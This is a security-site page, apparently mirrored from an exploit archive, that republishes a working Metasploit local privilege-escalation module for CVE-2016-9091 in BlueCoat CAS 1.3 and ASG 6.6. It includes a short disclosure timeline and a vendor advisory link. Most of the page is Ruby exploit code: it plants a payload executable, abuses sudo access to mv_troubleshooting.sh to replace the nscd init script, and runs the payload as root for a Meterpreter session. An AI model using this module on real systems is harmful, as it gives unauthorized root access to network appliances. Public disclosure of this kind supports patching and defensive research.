首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Bluecoat ASG 6.6/CAS 1.3 - Privilege Escalation (Metasploit)
来源:chrisdhebert[at]gmail.com 作者:Hebert 发布时间:2017-04-05  
# Exploit Title: OS Command Injection Vulnerability in BlueCoat ASG and CAS
# Date: April 3, 2017
# Exploit Authors:  Chris Hebert, Peter Paccione and Corey Boyd
# Contact: chrisdhebert[at]gmail.com
# Vendor Security Advisory: https://bto.bluecoat.com/security-advisory/sa138
# Version: CAS 1.3 prior to 1.3.7.4 & ASG 6.6 prior to 6.6.5.4 are vulnerable
# Tested on: BlueCoat CAS 1.3.7.1
# CVE : cve-2016-9091
 
Timeline:
--------
08/31/2016 (Vulnerablities Discovered)
03/31/2017 (Final Vendor Patch Confirmed)
04/03/2017 (Public Release)
 
Description:
The BlueCoat ASG and CAS management consoles are susceptible to a privilege escalation vulnerablity.
A malicious user with tomcat privileges can escalate to root via the vulnerable mvtroubleshooting.sh script.
 
Proof of Concept:
 
Metasploit Module - root priv escalation (via mvtroubleshooting.sh)
-----------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex'
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/exe'
 
 
class Metasploit4 < Msf::Exploit::Local
  Rank = AverageRanking
 
  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Exploit::Local::Linux
 
  def initialize(info={})
    super( update_info( info, {
        'Name'          => 'BlueCoat CAS 1.3.7.1 tomcat->root privilege escalation (via mvtroubleshooting.sh)',
        'Description'   => %q{
          This module abuses the sudo access granted to tomcat and the mvtroubleshooting.sh script to escalate
          privileges. In order to work, a tomcat session with access to sudo on the sudoers
          is needed. This module is useful for post exploitation of BlueCoat
          vulnerabilities, where typically web server privileges are acquired, and this
          user is allowed to execute sudo on the sudoers file.
        },
        'License'        => MSF_LICENSE,
        'Author'       => [
         'Chris Hebert <chrisdhebert[at]gmail.com>',
         'Pete Paccione <petepaccione[at]gmail.com>',
         'Corey Boyd <corey.k.boyd[at]gmail.com>'
        ],
        'DisclosureDate' => 'Vendor Contacted 8-31-2016',
        'References'     =>
        [
          ['EDB', '##TBD##'],
          ['CVE', '2016-9091' ],
          ['URL', 'http://https://bto.bluecoat.com/security-advisory/sa138']
        ],
        'Platform'       => %w{ linux unix },
        'Arch'           => [ ARCH_X86 ],
        'SessionTypes'   => [ 'shell', 'meterpreter' ],
        'Targets'        =>
          [
            [ 'Linux x86',       { 'Arch' => ARCH_X86 } ]
          ],
        'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
        'DefaultTarget' => 0,
      }
      ))
    register_options([
        OptString.new("WritableDir", [ false, "A directory where we can write files", "/var/log" ]),
      ], self.class)
  end
 
  def check
    id=cmd_exec("id -un")
    if id!="tomcat"
      print_status("#{peer} - ERROR - Session running as id= #{id}, but must be tomcat")
      fail_with(Failure::NoAccess, "Session running as id= #{id}, but must be tomcat")
    end
 
    clprelease=cmd_exec("cat /etc/clp-release | cut -d \" \" -f 3")
    if clprelease!="1.3.7.1"
      print_status("#{peer} - ERROR - BlueCoat version #{clprelease}, but must be 1.3.7.1")
      fail_with(Failure::NotVulnerable, "BlueCoat version #{clprelease}, but must be 1.3.7.1")
    end
 
    return Exploit::CheckCode::Vulnerable
  end
  def exploit
    print_status("#{peer} - Checking for vulnerable BlueCoat session...")
    if check != CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, "FAILED Exploit - BlueCoat not running as tomcat or not version 1.3.7.1")
    end
 
    print_status("#{peer} - Running Exploit...")
    exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf"
    write_file(exe_file, generate_payload_exe)
    cmd_exec "chmod +x #{exe_file}"
 
    begin
      #Backup original nscd init script
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /etc/init.d/nscd /data/bluecoat/avenger/ui/logs/tro$
      #Replaces /etc/init.d/nscd script with meterpreter payload
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh #{exe_file} /data/bluecoat/avenger/ui/logs/troubles$
      #Executes meterpreter payload as root
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/flush_dns.sh"
      #note, flush_dns.sh waits for payload to exit. (killing it falls over to init pid=1)
    ensure
      #Restores original nscd init script
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /var/log/nscd.backup /data/bluecoat/avenger/ui/logs$
      #Remove meterpreter payload (precautionary as most recent mv_troubleshooting.sh should also remove it)
      cmd_exec "/bin/rm -f #{exe_file}"
    end
    print_status("#{peer} - The exploit module has finished")
    #Maybe something here to deal with timeouts?? noticied inconsistant..  Exploit failed: Rex::TimeoutError Operation timed out.
 
  end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Bluecoat ASG 6.6/CAS 1.3 - OS
·SolarWinds LEM 6.3.1 - Remote
·Apache Tomcat 6/7/8/9 - Inform
·macOS Kernel 10.12.2 (16C67) -
·macOS Kernel 10.12.3 (16D32) -
·BackBox OS - Denial of Service
·Easy File Sharing FTP Server 3
·macOS/iOS Kernel 10.12.3 (16D3
·macOS/iOS Kernel 10.12.3 (16D3
·dnaLIMS Admin Module Command E
·dnaLIMS Directory Traversal Ex
·macOS/iOS Kernel 10.12.3 (16D3
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved